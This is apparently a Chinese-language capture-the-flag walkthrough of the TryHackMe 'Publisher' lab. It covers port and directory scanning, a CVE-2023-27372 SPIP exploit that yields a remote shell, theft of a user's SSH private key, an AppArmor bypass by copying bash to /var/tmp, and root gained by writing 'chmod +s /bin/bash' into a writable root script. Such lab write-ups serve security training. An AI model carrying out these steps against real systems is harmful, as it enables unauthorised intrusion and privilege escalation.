[THM] Publisher

端口扫描

nmap -sV -sC -v 10.49.147.252 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:10:01:9d:a0:cf:81:bf:2f:de:c7:95:78:b7:a6:1a (RSA)
|   256 35:87:52:45:57:3c:20:91:df:a5:e9:2b:89:70:e1:67 (ECDSA)
|_  256 84:f4:5f:b5:85:09:a8:97:2b:21:4d:20:f1:e9:37:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Publisher's Pulse: SPIP Insights & Tips
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 02:28
Completed NSE at 02:28, 0.00s elapsed
Initiating NSE at 02:28
Completed NSE at 02:28, 0.00s elapsed
Initiating NSE at 02:28
Completed NSE at 02:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds
           Raw packets sent: 1081 (47.540KB) | Rcvd: 1002 (40.088KB)

80端口服务探测

feroxbuster -u http://10.49.147.252 --depth=1 -x php,html,txt,zip,bak,json
                                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.49.147.252/
 🚩  In-Scope Url          │ 10.49.147.252
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, txt, zip, bak, json]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://10.49.147.252/images => http://10.49.147.252/images/
200      GET      354l      770w     5959c http://10.49.147.252/style.css
200      GET       32l      224w    17917c http://10.49.147.252/images/ads.jpg
200      GET      142l      610w    69796c http://10.49.147.252/images/image_02.jpg
200      GET      237l     1368w   110318c http://10.49.147.252/images/image_01.jpg
200      GET      150l      766w     8686c http://10.49.147.252/
200      GET      150l      766w     8686c http://10.49.147.252/index.html
301      GET        9l       28w      313c http://10.49.147.252/spip => http://10.49.147.252/spip/
[####################] - 15m   210063/210063  0s      found:8       errors:0      
[####################] - 15m   210000/210000  232/s   http://10.49.147.252/

发现spip目录,使用插件发现具体的版本,也可以在源代码中查看到版本

使用POC获取shell

python CVE-2023-27372.py -u http://10.49.147.252/spip/ 
[+] The URL http://10.49.147.252/spip/ is vulnerable
[!] Shell is ready, please type your commands UwU
# ls

README.md
SECURITY.md
composer.json
composer.lock
config
ecrire
htaccess.txt
index.php
local
plugins-dist
plugins-dist.json
prive
spip.php
spip.png
spip.svg
squelettes-dist
tmp
vendor

获取用户shell

找到用户think, 发现/home/think下公私钥可以读取

保存私钥id_rsa到本地,然后chmod 600 ida_123,对私钥进行设置权限

之后ssh -i id_123 think@10.48.186.53进行ssh登录think账户

权限提升

find / -perm -u=s -type f 2> /dev/null发现/usr/sbin/run_container是用户自己创建的程序,可能存在漏洞

下载到本地,使用ida进行反编译,查看伪c代码,发现是调用了/opt/run_container.sh

这里发现我们拥有修改的权限,但是提示权限不足

1 2	`ls -al /opt/run_container.sh -rwxrwxrwx 1 root root 1715 Jan 10 2024 /opt/run_container.sh`

通过aa-status发现AppArmor启用了,这是一个Linux的强制访问控制系统

这里通过这两篇博文进行了解

通过/etc/passwd发现我们的shell是ash

AppArmor是基于路径,所以这里所以这里的/opt/,/home/,/bin/,/usr/bin/,/usr/sbin/,/tmp/这几个目录下我们都无法写入文件,因为正则匹配,但是/dev/shm/和/var/tmp/下确实可以的

我们可以复制一个bash到这个目录下来获取一个正常的shell,不被AppArmor来限制,从而绕过

 cat /etc/apparmor.d/usr.sbin.ash 
#include <tunables/global>
/usr/sbin/ash flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/bash>
  #include <abstractions/consoles>
  #include <abstractions/nameservice>
  #include <abstractions/user-tmp>

  # Remove specific file path rules
  # Deny access to certain directories
  deny /opt/ r,
  deny /opt/** w,
  deny /tmp/** w,
  deny /dev/shm w,
  deny /var/tmp w,
  deny /home/** w,
  /usr/bin/** mrix,
  /usr/sbin/** mrix,

  # Simplified rule for accessing /home directory
  owner /home/** rix,
}
think@ip-10-48-186-53:~$ cp /bin/bash /var/tmp/bash

获取一个正常的shell之后,我们可以在/opt/run_container.sh中写入东西了,这里给bash添加suid

think@ip-10-48-186-53:~$ echo "chmod +s /bin/bash" > /opt/run_container.sh 
think@ip-10-48-186-53:~$ /usr/sbin/run_container 
think@ip-10-48-186-53:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash

然后就可以利用suid的bash获取root权限

10-48-186-53:~$ /bin/bash -p
bash-5.0# ls
spip  user.txt
bash-5.0# id
uid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)

总结

CMS版本识别,找到对应的CVE
二进制文件分析
绕过AppArmor